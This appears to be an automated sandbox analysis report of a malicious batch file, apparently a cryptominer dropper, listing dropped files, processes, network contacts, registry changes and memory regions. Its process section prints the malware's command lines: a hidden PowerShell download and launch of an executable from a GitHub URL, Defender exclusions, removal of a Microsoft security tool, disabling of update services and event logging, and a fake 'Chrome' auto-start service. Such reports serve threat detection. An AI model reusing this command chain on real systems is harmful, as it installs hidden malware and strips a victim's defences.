Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
eshkere.bat
|
DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Chrome.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\1348.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\drivers\etc\hosts
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Windows\Temp\lhaqmlexwhjs.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aidyod01.phk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d40aw3j0.bta.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elhhx1av.bhd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gay0ae0w.aip.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzu3hwdv.fdf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og2z4uv5.rzp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygtrmnw4.yrk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmmirluw.g1a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_0smp4f3y.ej3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_45z5hu4h.4sj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_inkywt32.aux.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\Temp\__PSScriptPolicyTest_np5tl1ul.ulz.psm1
|
ASCII text, with no line terminators
|
dropped
|
There are 9 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe',
'C:\Users\user\AppData\Local\Temp\1348.exe')"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"
|
|
|
|
C:\Users\user\AppData\Local\Temp\1348.exe
|
"C:\Users\user\AppData\Local\Temp\1348.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData)
-ExclusionExtension '.exe' -Force
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop UsoSvc
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop WaaSMedicSvc
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop wuauserv
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop bits
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop dosvc
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe delete "Chrome"
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto"
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop eventlog
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe start "Chrome"
|
|
|
|
C:\ProgramData\Chrome.exe
|
C:\ProgramData\Chrome.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData)
-ExclusionExtension '.exe' -Force
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop UsoSvc
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop WaaSMedicSvc
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop wuauserv
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop bits
|
|
|
|
C:\Windows\System32\sc.exe
|
C:\Windows\system32\sc.exe stop dosvc
|
|
|
|
C:\Windows\explorer.exe
|
explorer.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wusa.exe
|
wusa /uninstall /kb:890830 /quiet /norestart
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wusa.exe
|
wusa /uninstall /kb:890830 /quiet /norestart
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe
|
There are 36 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://github.com
|
unknown
|
|
|
|
https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe
|
140.82.121.4
|
|
|
|
https://github.com/
|
unknown
|
|
|
|
https://pastebin.com/raw/FBXiGyZ9
|
104.20.4.235
|
|
|
|
https://github.com/fruktoozik/qnfr8P
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://github.com/fruktoozik/qnfr/rawf
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://ocsp.digicert.co
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://github.com
|
unknown
|
||
|
https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP
|
unknown
|
||
|
http://ocsp.digicert.coductVersion124
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://ocsp.digicert.cod
|
unknown
|
||
|
https://www.drweb.ru/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://www.kaspersky.ru/downloads/free-virus-removal-tool
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://raw.githubusercontent.com/fruktoozik/qnfr/refs/heads/main/frik.exe
|
185.199.109.133
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://crl.micros
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
github.com
|
140.82.121.4
|
|
|
|
pool.hashvault.pro
|
95.179.241.203
|
|
|
|
pastebin.com
|
104.20.4.235
|
|
|
|
raw.githubusercontent.com
|
185.199.109.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
95.179.241.203
|
pool.hashvault.pro
|
Netherlands
|
|
|
|
104.20.4.235
|
pastebin.com
|
United States
|
|
|
|
140.82.121.4
|
github.com
|
United States
|
|
|
|
185.199.109.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
|
DontOfferThroughWUAU
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8DF000
|
heap
|
page read and write
|
|
|
|
77EFFD000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF795BFB000
|
unkown
|
page readonly
|
||
|
1603B700000
|
heap
|
page read and write
|
||
|
166BE744000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
257018D5000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1469000
|
heap
|
page read and write
|
||
|
1C60000
|
trusted library allocation
|
page read and write
|
||
|
17F0BA20000
|
heap
|
page read and write
|
||
|
21C95FA0000
|
heap
|
page read and write
|
||
|
2800000
|
direct allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
24B91587000
|
heap
|
page read and write
|
||
|
21C95FC0000
|
heap
|
page read and write
|
||
|
8200000
|
direct allocation
|
page read and write
|
||
|
135E000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
77F2FF000
|
stack
|
page read and write
|
||
|
2576F510000
|
heap
|
page read and write
|
||
|
DFD727E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF888160000
|
trusted library allocation
|
page read and write
|
||
|
DFD73FB000
|
stack
|
page read and write
|
||
|
5000000
|
direct allocation
|
page read and write
|
||
|
147A44F0000
|
unkown
|
page read and write
|
||
|
25701347000
|
trusted library allocation
|
page read and write
|
||
|
1C60000
|
direct allocation
|
page execute and read and write
|
||
|
4A32B7F000
|
stack
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
CB0000
|
direct allocation
|
page execute read
|
||
|
2576F800000
|
heap
|
page read and write
|
||
|
2844E6D9000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
26506E00000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
9024B7E000
|
stack
|
page read and write
|
||
|
8EF000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1EFDC194000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8880D2000
|
trusted library allocation
|
page read and write
|
||
|
166BE310000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888150000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2576D6DD000
|
heap
|
page read and write
|
||
|
E8307E000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
2576D780000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
26506EC0000
|
heap
|
page read and write
|
||
|
1459000
|
heap
|
page read and write
|
||
|
4600000
|
direct allocation
|
page read and write
|
||
|
2570160B000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
11DE000
|
stack
|
page read and write
|
||
|
1603B780000
|
heap
|
page read and write
|
||
|
7FF795BF1000
|
unkown
|
page execute read
|
||
|
2576F81D000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
4AAA7F000
|
stack
|
page read and write
|
||
|
2576F853000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887FAC000
|
trusted library allocation
|
page execute and read and write
|
||
|
271AB0A0000
|
heap
|
page read and write
|
||
|
21C96060000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2576F5F2000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
148F000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF795D5F000
|
unkown
|
page write copy
|
||
|
2844E8C4000
|
heap
|
page read and write
|
||
|
1C4349D0000
|
heap
|
page read and write
|
||
|
7FF8880AA000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF8881F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887EF2000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
29B1BAE0000
|
heap
|
page read and write
|
||
|
2571006C000
|
trusted library allocation
|
page read and write
|
||
|
1491000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
216FA670000
|
heap
|
page read and write
|
||
|
1C4348F0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
CF5000
|
heap
|
page read and write
|
||
|
CE0000
|
trusted library allocation
|
page read and write
|
||
|
412DDC000
|
stack
|
page read and write
|
||
|
D15F1FE000
|
unkown
|
page readonly
|
||
|
147A4670000
|
unkown
|
page read and write
|
||
|
1F838FE000
|
stack
|
page read and write
|
||
|
25701B56000
|
trusted library allocation
|
page read and write
|
||
|
7FF796257000
|
unkown
|
page read and write
|
||
|
2576D6B0000
|
heap
|
page read and write
|
||
|
C7E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2844E5D0000
|
heap
|
page read and write
|
||
|
2576D66F000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
166BE740000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF795D5B000
|
unkown
|
page readonly
|
||
|
7FF8880B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF795D50000
|
unkown
|
page readonly
|
||
|
2576D690000
|
heap
|
page read and write
|
||
|
2151E9B5000
|
heap
|
page read and write
|
||
|
2570160E000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
5B90F3D000
|
stack
|
page read and write
|
||
|
257101AF000
|
trusted library allocation
|
page read and write
|
||
|
4AA87D000
|
stack
|
page read and write
|
||
|
216FA2C0000
|
heap
|
page read and write
|
||
|
2576D7E0000
|
heap
|
page readonly
|
||
|
7FF887FD6000
|
trusted library allocation
|
page execute and read and write
|
||
|
216FA675000
|
heap
|
page read and write
|
||
|
1C60000
|
trusted library allocation
|
page read and write
|
||
|
1EFCA7E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF795D51000
|
unkown
|
page execute read
|
||
|
2576F7D0000
|
heap
|
page execute and read and write
|
||
|
CFF7AAC000
|
stack
|
page read and write
|
||
|
7FF79625C000
|
unkown
|
page readonly
|
||
|
D4AFF9E000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF8881D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF795D5B000
|
unkown
|
page readonly
|
||
|
7FF888190000
|
trusted library allocation
|
page read and write
|
||
|
2576F56C000
|
heap
|
page read and write
|
||
|
12DF000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
5B912FF000
|
stack
|
page read and write
|
||
|
2844E6D0000
|
heap
|
page read and write
|
||
|
7FF7960F9000
|
unkown
|
page readonly
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
77F3FE000
|
stack
|
page read and write
|
||
|
3C00000
|
direct allocation
|
page read and write
|
||
|
5A00000
|
direct allocation
|
page read and write
|
||
|
1C008CB5000
|
heap
|
page read and write
|
||
|
7FF795BFE000
|
unkown
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
271AAED0000
|
heap
|
page read and write
|
||
|
1493000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
24B914A0000
|
heap
|
page read and write
|
||
|
271AB210000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1C5E000
|
stack
|
page read and write
|
||
|
2151E830000
|
heap
|
page read and write
|
||
|
2576D7D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888170000
|
trusted library allocation
|
page read and write
|
||
|
12BA86A0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
147A44F0000
|
unkown
|
page read and write
|
||
|
1D30000
|
direct allocation
|
page execute and read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
8F4000
|
heap
|
page read and write
|
||
|
DFD69CF000
|
stack
|
page read and write
|
||
|
2576D73B000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1C008A50000
|
heap
|
page read and write
|
||
|
4A3275C000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
B5E000
|
stack
|
page read and write
|
||
|
DFD7DCE000
|
stack
|
page read and write
|
||
|
1461000
|
heap
|
page read and write
|
||
|
5B90F4D000
|
stack
|
page read and write
|
||
|
166BE399000
|
heap
|
page read and write
|
||
|
2570184F000
|
trusted library allocation
|
page read and write
|
||
|
A9D907D000
|
stack
|
page read and write
|
||
|
4130FF000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1603B789000
|
heap
|
page read and write
|
||
|
7FF8881A0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF8881B0000
|
trusted library allocation
|
page read and write
|
||
|
216FA330000
|
heap
|
page read and write
|
||
|
2576F6F0000
|
heap
|
page read and write
|
||
|
216FA2A0000
|
heap
|
page read and write
|
||
|
1EFDBFA0000
|
heap
|
page read and write
|
||
|
91B000
|
heap
|
page read and write
|
||
|
2570171B000
|
trusted library allocation
|
page read and write
|
||
|
2151E750000
|
heap
|
page read and write
|
||
|
1C008CB0000
|
heap
|
page read and write
|
||
|
DFD7E4E000
|
stack
|
page read and write
|
||
|
216FA290000
|
heap
|
page read and write
|
||
|
2576F824000
|
heap
|
page read and write
|
||
|
148D000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
DFD7ECD000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1E00000
|
direct allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1603B6F0000
|
heap
|
page read and write
|
||
|
6400000
|
direct allocation
|
page read and write
|
||
|
2570164A000
|
trusted library allocation
|
page read and write
|
||
|
2576D692000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1C4349F0000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1C60000
|
trusted library allocation
|
page read and write
|
||
|
2576D69C000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2576F85E000
|
heap
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1B5F000
|
stack
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1495000
|
heap
|
page read and write
|
||
|
DFD6F7E000
|
stack
|
page read and write
|
||
|
7FF888230000
|
trusted library allocation
|
page read and write
|
||
|
7FF795BF0000
|
unkown
|
page readonly
|
||
|
917000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
4AA97E000
|
stack
|
page read and write
|
||
|
17F0BA29000
|
heap
|
page read and write
|
||
|
2576D520000
|
heap
|
page read and write
|
||
|
DFD7076000
|
stack
|
page read and write
|
||
|
7FF7960F9000
|
unkown
|
page readonly
|
||
|
24B91570000
|
heap
|
page read and write
|
||
|
7FF796259000
|
unkown
|
page readonly
|
||
|
26506E55000
|
heap
|
page read and write
|
||
|
D4B027E000
|
stack
|
page read and write
|
||
|
284CEBC5000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
42D39FF000
|
stack
|
page read and write
|
||
|
1C434CF5000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
24B91480000
|
heap
|
page read and write
|
||
|
284CE890000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
9024A7F000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2007EB00000
|
unkown
|
page read and write
|
||
|
7FF888110000
|
trusted library allocation
|
page read and write
|
||
|
1D20000
|
direct allocation
|
page execute and read and write
|
||
|
12BA87A0000
|
heap
|
page read and write
|
||
|
2576D620000
|
heap
|
page read and write
|
||
|
140001000
|
unkown
|
page execute read
|
||
|
D03067C000
|
stack
|
page read and write
|
||
|
7FF795BF1000
|
unkown
|
page execute read
|
||
|
14B7000
|
heap
|
page read and write
|
||
|
24B913A0000
|
heap
|
page read and write
|
||
|
7FF7960FC000
|
unkown
|
page readonly
|
||
|
12BA8A14000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
25700C31000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
2007EAD0000
|
heap
|
page read and write
|
||
|
D0306FE000
|
stack
|
page read and write
|
||
|
28450240000
|
heap
|
page read and write
|
||
|
7FF795BFE000
|
unkown
|
page write copy
|
||
|
2576F350000
|
trusted library allocation
|
page read and write
|
||
|
1CA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1450000
|
heap
|
page read and write
|
||
|
7FF888180000
|
trusted library allocation
|
page read and write
|
||
|
2570187A000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
7FF7960F7000
|
unkown
|
page read and write
|
||
|
24B91574000
|
heap
|
page read and write
|
||
|
D15F17E000
|
stack
|
page read and write
|
||
|
7FF795D5E000
|
unkown
|
page read and write
|
||
|
284CE898000
|
heap
|
page read and write
|
||
|
ED11F7E000
|
stack
|
page read and write
|
||
|
125C000
|
stack
|
page read and write
|
||
|
26506E10000
|
heap
|
page read and write
|
||
|
7FF888090000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
1420000
|
heap
|
page read and write
|
||
|
6792DCD000
|
stack
|
page read and write
|
||
|
7FF887FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF888250000
|
trusted library allocation
|
page read and write
|
||
|
DFD70FB000
|
stack
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1EFDBEB0000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
1D1E000
|
stack
|
page read and write
|
||
|
2151E9B0000
|
heap
|
page read and write
|
||
|
144A000
|
heap
|
page read and write
|
||
|
147A4570000
|
heap
|
page read and write
|
||
|
2576D770000
|
heap
|
page read and write
|
||
|
1D40000
|
trusted library allocation
|
page read and write
|
||
|
95C000
|
heap
|
page read and write
|
||
|
